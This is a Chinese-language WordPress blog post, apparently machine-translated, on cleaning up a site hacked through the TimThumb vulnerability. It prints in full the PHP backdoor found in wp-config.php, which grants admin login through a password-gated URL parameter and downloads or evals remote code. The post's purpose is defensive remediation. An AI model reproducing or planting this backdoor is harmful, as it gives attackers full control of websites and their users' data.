如何在WordPress中修复和清理TimThumb Hack

发表于： 2018年12月30日 2019年1月17日
分类： PHP, WordPress
标签： ch, config, content, curl, CURLOPT, file, GET, Hack, isset, jS, login, php, pingnow, setopt, TimThumb, user, WordPress, WP

所以，如果你没记错的话，8月份的TimThumb脚本存在安全问题。但令我们惊讶的是，许多网站仍在使用旧版本。到目前为止，我们在过去一个月内修复了三个网站，一个是昨天。因此，简单地编写一步一步的文章是有道理的，因此我们的用户可以遵循它。我们解决这个问题的三个用户都不知道TimThumb是什么，或者他们是否使用它。

TimThumb是一个调整图像大小的PHP脚本。它有一个漏洞，但现在使用它是安全的。

那你怎么知道你的网站被黑了？如果您在访问自己的网站时在浏览器上看到一个大红色屏幕：

Something

如果您开始收到有关用户从您的网站重定向的电子邮件的轰炸。最有可能的情况是，您的网站是此漏洞的受害者。

作为一项预防措施，每个人都应该使用这个Timthumb漏洞扫描程序。这将告诉您是否使用旧版TimThumb。许多主题俱乐部立即升级了他们的核心。因此，这个插件将检查是否安装了新的安全版本的Timthumb或是否安装了旧版本。

现在，如果您的网站已经成为这个Timthumb漏洞的牺牲品，那么这就是您需要做的事情。

首先，您需要删除以下文件：

/wp-admin/upd.php
/wp-content/upd.php

登录WordPress管理面板并重新安装WordPress版本。我们特意寻找重新安装这些文件：

/wp-settings.php
/wp-includes/js/jquery/jquery.js
/wp-includes/js/110n.js

然后打开你的 wp-config.php 你最有可能找到这个收集登录凭据的大恶意软件代码和饼干。此代码将显示在底部。

if (isset($_GET["pingnow"])&& isset($_GET["pass"])){
if ($_GET["pass"] == "19ca14e7ea6328a42e0eb13d585e4c22"){
if ($_GET["pingnow"]== "login"){
$user_login = "admin";
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action("wp_login", $user_login);
}
if (($_GET["pingnow"]== "exec")&&(isset($_GET["file"]))){
$ch = curl_init($_GET["file"]);
$fnm = md5(rand(0,100)).".php";
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href="$fnm";</SCRIPT>";
}
if (($_GET["pingnow"]== "eval")&&(isset($_GET["file"]))){
$ch = curl_init($_GET["file"]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}

在您的主题文件夹中，查找TimThumb脚本可能存储缓存文件的任何位置。通常它们处于这种结构中：

/wp-content/themes/themename/scripts/cache/external_{MD5Hash}.php
/wp-content/themes/themename/temp/cache/external_{MD5Hash}.php

删除看起来像这样的所有内容。如果您对某些事情不确定，请删除不是图像文件的所有内容。

您要做的下一件事是将timthumb.php替换为最新版本，可以在http：// timthumb找到。googlecode.com/svn/trunk/timthumb.php

现在，从MySQL登录信息开始，将密码更改为WordPress登录信息是个不错的主意。不要忘记在wp-config.php中更改MySQL的密码，否则将出现“Error Establishing Connection”屏幕。

更改wp-config.php文件中的密钥。您可以通过转到在线生成器来生成新密钥。

现在您已完成。不要忘记清空所有页面缓存插件。作为一种警示措施，最好清除浏览器缓存和cookie。

对于开发人员，请尝试使用WordPress中的“附加图像大小”功能来替换Timthumb功能。

2022 年 7 个最佳 Instagram WordPress 插件（比较） 2020年7月7日
类的定义、参数声明、数据成员使用详解(9) - python入门教程 2019年1月6日
域名的真正成本是多少？（专家解答） 2020年1月6日
什么是WordPress 3.9（功能和截图） 2018年12月26日
如何添加NoFollow复选框以在WordPress中插入链接部分 2018年12月29日
如何在 WordPress 中跟踪和减少填写表单时放弃 2020年2月26日
如何在WordPress主题中显示博客帖子元数据 2018年12月25日
WordPress用户界面的演变（2003 - 2017） 2018年12月26日
print-format-输入输出-文件处理-JSON格式等详解(7)python入门教程（原版） 2019年1月5日
WordPress 转化跟踪变得简单-分步指南 2020年5月31日
如何安装和设置简单的Facebook Connect for WordPress 2018年12月29日